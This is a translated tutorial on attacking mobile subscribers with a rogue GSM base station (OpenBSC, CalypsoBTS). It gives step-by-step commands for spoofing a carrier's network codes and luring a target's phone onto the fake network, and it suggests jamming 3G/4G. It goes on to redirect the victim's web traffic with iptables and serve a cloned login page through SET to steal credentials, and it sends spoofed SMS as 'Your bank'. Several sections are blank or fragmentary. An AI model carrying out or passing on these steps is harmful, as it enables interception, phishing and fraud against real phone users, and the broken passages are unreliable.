Practical examples of attacks inside a GSM network

Attention!
This article is provided solely for educational purposes and the author does not bear any responsibility for the actions of other users, their interference in commercial GSM networks and damage to their own equipment. Before you start anything, make sure that you understand what you are doing.

Training

apt-get install osmo-sip-connector
apt-get install libsofia-sip-ua-glib-dev
apt-get install asterisk

app
mncc
  socket-path /tmp/bsc_mncc
sip
  local 127.0.0.1 5069
  remote 127.0.0.1 5060

Configuring asterisk

A very basic configuration of Asterisk might look like this

Add to the end of the file /etc/asterisk/sip.conf

[GSM]
type=friend
host=127.0.0.1
dtmfmode=rfc2833
canreinvite=no
allow=all
context=gsmsubscriber
port=5069

Add to the end of the file /etc/asterisk/extensions.conf

[gsmsubscriber]
exten=>_XXXXX,1,Dial(SIP/GSM/${EXTEN})
exten=>_XXXXX,n,Playback(vm-nobodyavail)
exten=>_XXXXX,n,HangUp()

Restart asterisk.

Capturing a subscriber to our GSM network

2G / 3G / 4G

Immediately consider two options:

 
      
 
        
The target subscriber uses an old phone without 3G / 4G support.
 
        
The target subscriber uses a modern smartphone that supports 4G.
 
      

In the second case, the smartphone will first look for 4G networks, then 3G networks, and only then 2G networks. Thus, if you are in a place where there is a good signal from the 3G / 4G base station of the home operator of the subscriber, then he will not connect to your 2G base station.

To solve this problem, you need to either interfere with the operator’s 3G / 4G frequencies, or be with the subscriber in a location where there is no 3G or 4G coverage. Contrary to the doubts of many people, there are still a lot of such places.

In the first case, when the target phone does not support 3G / 4G, everything becomes easier and our base station should 
simply be in the reach of the target phone and have a sufficiently powerful signal.

MCC / MNC

For the phone to automatically connect to our GSM network, it must be the home SIM card installed in the target phone.

A home network is determined by three parameters:

 
      
 
        
MNC (Mobile Network Code)
 
        
MCC (Mobile Country Code)
 
        
Networ Name
 
      

All these values ​​are not a secret and you can easily find them even from Wikipedia.
These parameters are transmitted to the base station in SI (System Information) messages on the logical channel BCCH (Timeslot 0).

Now we have the following in our OpenBSC settings:

network country code 1
mobile network code 1
short name MyNet
long name MyNet

You can find out the MCC and MNC of the subscriber based on the phone number. There are many sites with this information, for example this one . Finding a name in the Latin alphabet of the network is also not difficult. Please note that the name is case sensitive.

At home, you will also need to change the auth-policy to closed so that only your phones have the right to connect to the network with real MCC and MNC.

To do this, add subscribers to the HLR with IMSI of your personal SIM cards, if they are not already in the HLR.

telnet localhost 4242
en
conf t
subscriber create imsi ВАШ_IMSI_1
subscriber imsi ВАШ_IMSI_1 authorized 1
subscriber create imsi ВАШ_IMSI_2
subscriber imsi ВАШ_IMSI_2 authorized 1
...
write file
end

And change the authentication policy

telnet localhost 4242
en
conf t
network
auth policy closed
write file
end

Restart OsmoNITB.

Now, subscribers who are not represented in the HLR will not be able to connect to your network.

IMEI

IMEI - International Mobile Equipment Identity.

When subscribers start connecting to your network, how do you know who exactly you need? You do not see phone numbers, you only see IMSI and IMEI. Knowing IMEI, you can uniquely determine the model of the phone into which the SIM card is inserted. For example, using the site http://www.imei.info/ . The model and origin of the phone is described by the first 8 digits of IMEI . Phones that support simultaneous work with multiple SIM cards are assigned multiple IMEI numbers.

Thus, if you know that the target subscriber uses Apple iPhone 5, then you can download the database with TAC codes and find out the TAC for iPhone 5. osmocom has such a database - http://tacdb.osmocom.org/

In order not to capture to your network of subscribers with the wrong TAC, it would be nice to refuse subscribers when registering if their equipment does not have TAC for iPhone 5.

At the moment I have not found the settings for EIR in OsmoNITB, but soon we will have freestanding MSC, HLR, and possibly EIR, and there it will be.

At the moment, we will manually control the connected subscribers. You can simply set everyone to “authorized 0” if his
IMEI does not suit us.

OpenBSC# subscriber imsi 123456789012345 authorized 0

Now, all that remains is to be near the subscriber and launch CalypsoBTS.

MITM while GPRS surfing

When a subscriber gets into our network, he becomes inaccessible to external calls and cannot call anywhere (usually, see the exception text below).

However, we can provide him access to the Internet using GPRS / EDGE packet data services. Since the machine that provides Internet access for the subscriber is completely under our control, we can do anything with TCP / IP traffic.

The easiest way for us to work with this site

 
    
 
    
    
    
    
I remind you that the data transfer speed in GPRS is very low, at the same time, modern phones, when gaining access to the network, immediately begin the process of checking for updates, mail, news. All your applications begin to update their data. This can lead to the fact that it will be difficult for the subscriber to open something in the browser, since, in addition to low bandwidth, packet loss can occur if you use such unproductive equipment as CalypsoBTS.

Therefore, when planning a MITM attack, you need to keep this in mind. It is possible, for example, to block through iptables access to everything except the resource, the interaction of the victim with which we are interested.

Further, using the MITMf framework, attacks can be carried out directly.

We will redirect all HTTP subscriber requests to our web server. 

iptables -t nat -A PREROUTING -i tun0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.1.32:80

Where 192.168.1.32 is the IP address of the Kali Linux machine, which I will use to attack.

Additionally, you can prohibit all other requests to port 443 and others in order to increase the download speed of a phishing site.

We will use the SE Toolkit to copy the site and conduct a phishing attack.

Run SET 
    
 
      
   
      
 
      
      
      
      
      
      
      
      
      
      
      
      
      
      
We want to get credentials from a specific site. Configure SET.  
    
 
    
 
      
   
    
 
    
 
      
   
    
 
    
 
      
 
    
 
    
Create a defcon.ru authentication phishing page.   
    
 
    
 
      
 
    
When you try to go to any site through the attacker\'s GPRS network service, the victim gets to the phishing page (pay attention to the URL).

telnet localhost 4242
OpenBSC# en
OpenBSC# subscriber create imsi 123456789012345
OpenBSC# subscriber imsi 123456789012345 extension 89001234567

OpenBSC# subscriber imsi 987654321987654 sms sender extension 890012345678 send Your bank...

-M /tmp/bsc_mncc

osmo-sip-connector -c путь_до_конфигурационного_файла

telnet localhost 4242
en
conf t
network
rrlp mode РЕЖИМ
write file
end